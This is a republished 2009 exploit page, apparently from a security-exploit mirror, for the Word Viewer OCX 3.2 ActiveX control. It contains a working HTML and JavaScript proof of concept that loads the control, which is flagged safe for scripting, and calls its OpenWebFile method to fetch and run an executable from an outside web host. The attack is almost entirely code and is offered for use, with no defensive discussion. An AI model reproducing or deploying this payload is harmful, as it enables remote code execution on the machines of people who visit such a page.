Word Viewer OCX 3.2 Remote File Execution exploit
|
来源:www.vfcocus.net 作者:Stack 发布时间:2009-01-14
|
|
<HTML> ---------------------------------------------------------- <br> Word viewer OCX V 3.2 Remote File execution exploit<br> ---------------------------------------------------------- <br> -----------------------------------<br> # By Mountassif Moad a.k.a Stack # -----------------------------------<br> <!-- v4 Team & evil finger Class OA GUID: {97AF4A45-49BE-4485-9F55-91AB40F22BF2} Number of Interfaces: 1 Default Interface: _DOA RegKey Safe for Script: True RegkeySafe for Init: True KillBitSet: False Report for Clsid: {97AF4A45-49BE-4485-9F55-91AB40F22BF2} RegKey Safe for Script: True RegKey Safe for Init: True Implements IObjectSafety: True IDisp Safe: Safe for untrusted: caller,data IPersist Safe: Safe for untrusted: caller,data IPStorage Safe: Safe for untrusted: caller,data --> <title>Word viewer OCX V 3.2 Remote File execution exploit</title> <BODY> <object id=Stack classid="clsid:{97AF4A45-49BE-4485-9F55-91AB40F22BF2}"></object> <SCRIPT> function Do_it() { File = "http://monmaroc.com/calc.exe" Stack.OpenWebFile(File) }
</SCRIPT> <input language=JavaScript onclick=Do_it() type=button value="exploit"> </body> </HTML>
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|